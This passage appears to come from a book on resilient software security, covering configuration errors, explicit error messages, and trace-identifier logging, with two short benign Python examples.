We must also consider configuration bugs and error messages as part of fostering thoughtful dependency analysis. Configuration bugs—often referred to as “misconfigurations”—arise because the people who designed and built the system have different mental models than the people who use the system. When we build systems, we need to be open to feedback from users; the user’s mental model matters more than our own, since they will feel the impact of any misconfigurations. As we’ll discuss more in Chapter 6, we shouldn’t rely on “user error” or “human error” as a shallow explanation. When we build something, we need to build it based on realistic use, not the Platonic ideal of a user.

We must track configuration errors and mistakes and treat them just like other bugs.17 We shouldn’t assume users or operators read docs or manuals enough to fully absorb them, nor should we rely on users or operators perusing the source code. We certainly shouldn’t assume that the humans configuring the software are infallible or will possess the same rich context we have as builders. What feels basic to us may feel esoteric to users. An iconic reply to exemplify this principle is from 2004, when a user sent an email to the OpenLDAP mailing list in response to the developer’s comment that “the reference manual already states, near the top….” The response read: “You are assuming that those who read that, understood what the context of ‘user’ was. I most assuredly did not until now. Unfortunately, many of us don’t come from UNIX backgrounds and though pick up on many things, some things which seem basic to you guys elude us for some time.”

As we’ll discuss more in Chapter 6, we shouldn’t blame human behavior when things go wrong, but instead strive to help the human succeed even as things go wrong. We want our software to facilitate graceful adaptation to users’ configuration errors. As one study advises: “If a user’s misconfiguration causes the system to crash, hang, or fail silently, the user has no choice but [to] report [it] to technical support. Not only do the users suffer from system downtime, but also the developers, who have to spend time and effort troubleshooting the errors and perhaps compensating the users’ losses.”18

How do we help the sociotechnical system adapt in the face of configuration errors? We can encourage explicit error messages that generate a feedback loop (we’ll talk more about feedback loops later in this chapter). As Yin et al. found in an empirical study on configuration errors in commercial and open source systems, only 7.2% to 15.5% of misconfiguration errors provided explicit messages to help users pinpoint the error.19 When there are explicit error messages, diagnosis time is shortened by 3 to 13 times relative to ambiguous messages and by 1.2 to 14.5 times relative to cases with no messages at all.

Despite this empirical evidence, infosec folk wisdom says that descriptive error messages are pestiferous because attackers can learn things from the message that assist their operation. Sure, and using the internet facilitates attacks—should we avoid it too? Our philosophy is that we should not punish legitimate users just because attackers can, on occasion, gain an advantage. This does not mean we provide verbose error messages in all cases. The proper amount of elaboration depends on the system or component in question and the nature of the error. If our part of the system is close to a security boundary, then we likely want to be more cautious in what we reveal. The ad absurdum of expressive error messages at a security boundary would be, for instance, a login page that returns the error: “That was a really close guess to the correct password!”

As a general heuristic, we should trend toward giving more information in error messages until shown how that information could be misused (like how disclosing that a password guess was close to the real thing could easily aid attackers). If it’s a foreseen error that the user can reasonably do something about, we should present it to them in human-readable text. The system is there so that users and the organization can achieve some goal, and descriptive error messages help users understand what they’ve done wrong and remedy it.
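For a foreseen configuration error, an explicit message can name the setting, show the value we received, and say what would be accepted. The following is a minimal sketch under stated assumptions: the setting names (port, log_level), their allowed values, and the ConfigError class are hypothetical and chosen only for illustration.

```python
class ConfigError(ValueError):
    """A configuration problem the user can fix, described in plain language."""


ALLOWED_LOG_LEVELS = ("debug", "info", "warning", "error")


def validate_config(config: dict) -> None:
    """Collect every problem at once so the user can fix them in one pass."""
    problems = []

    port = config.get("port")
    if port is None:
        problems.append('"port" is missing; add a line such as port: 8443')
    elif not isinstance(port, int) or isinstance(port, bool) or not 1 <= port <= 65535:
        problems.append(
            f'"port" is {port!r}, but it must be a whole number from 1 to 65535'
        )

    log_level = config.get("log_level", "info")
    if log_level not in ALLOWED_LOG_LEVELS:
        allowed_text = ", ".join(ALLOWED_LOG_LEVELS)
        problems.append(
            f'"log_level" is {log_level!r}, but it must be one of: {allowed_text}'
        )

    if problems:
        raise ConfigError("Configuration has problems:\n- " + "\n- ".join(problems))


# Usage: a quoted port and an unsupported log level are both reported together.
try:
    validate_config({"port": "8443", "log_level": "verbose"})
except ConfigError as exc:
    print(exc)
```

Reporting all problems in one message, rather than failing on the first, spares the user a fix-and-retry loop for each mistake.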

If the user can’t do anything about the error, even with details, then there’s no point in showing them. For that latter category of error, one pattern we can consider is returning some kind of trace identifier that a support operator can use to query the logs and see the details of the error (or even what else happened in the user’s session).20 With this pattern, if an attacker wants to glean some juicy error details from the logs, they must socially engineer the support operator (i.e., find a way to bamboozle them into revealing their credentials). If there’s no ability to talk to a support operator, there’s no point in showing the error trace ID since the user can’t do anything with it.
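The trace identifier pattern can be sketched in a few lines. This is an illustration under assumptions, not a prescribed implementation: the handle_request wrapper, the response shape, and the wording of the user-facing message are all hypothetical. The only real library calls are Python’s standard logging and uuid modules.

```python
import logging
import uuid

logger = logging.getLogger("app.errors")


def handle_request(handler, request):
    """Run a handler; on an unforeseen error, log details and return only a trace ID."""
    try:
        return {"status": 200, "body": handler(request)}
    except Exception:
        trace_id = uuid.uuid4().hex
        # The exception message and stack trace go to the logs, keyed by the
        # trace ID, so a support operator can look them up later.
        logger.exception("unhandled error trace_id=%s", trace_id)
        # The user sees nothing about the internals, only a reference to quote.
        return {
            "status": 500,
            "body": (
                "Something went wrong on our side. "
                f"If you contact support, please quote reference {trace_id}."
            ),
        }


def failing_handler(request):
    # Hypothetical failure whose message we would not want to show to a user.
    raise RuntimeError("database rejected credentials for service account")


response = handle_request(failing_handler, {"path": "/orders"})
print(response["body"])
```

Because the details live only in the logs, what the user (or an attacker) sees is a random identifier that is useless without access to a support operator.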

Tip

Never should a system dump a stack trace into a user’s face unless that user can be expected to build a new version of the software (or take some other tangible action). It’s uncivilized to do so.

To recap, during the build and delivery phase, we can pursue four practices to support safety boundaries, the second ingredient of our resilience potion: anticipating scale, automating security checks via CI/CD, standardizing patterns and tools, and performing thoughtful dependency analysis. Now let’s proceed to the third ingredient: observing system interactions across space-time.

Observe System Interactions Across Space-Time (or Make More Linear)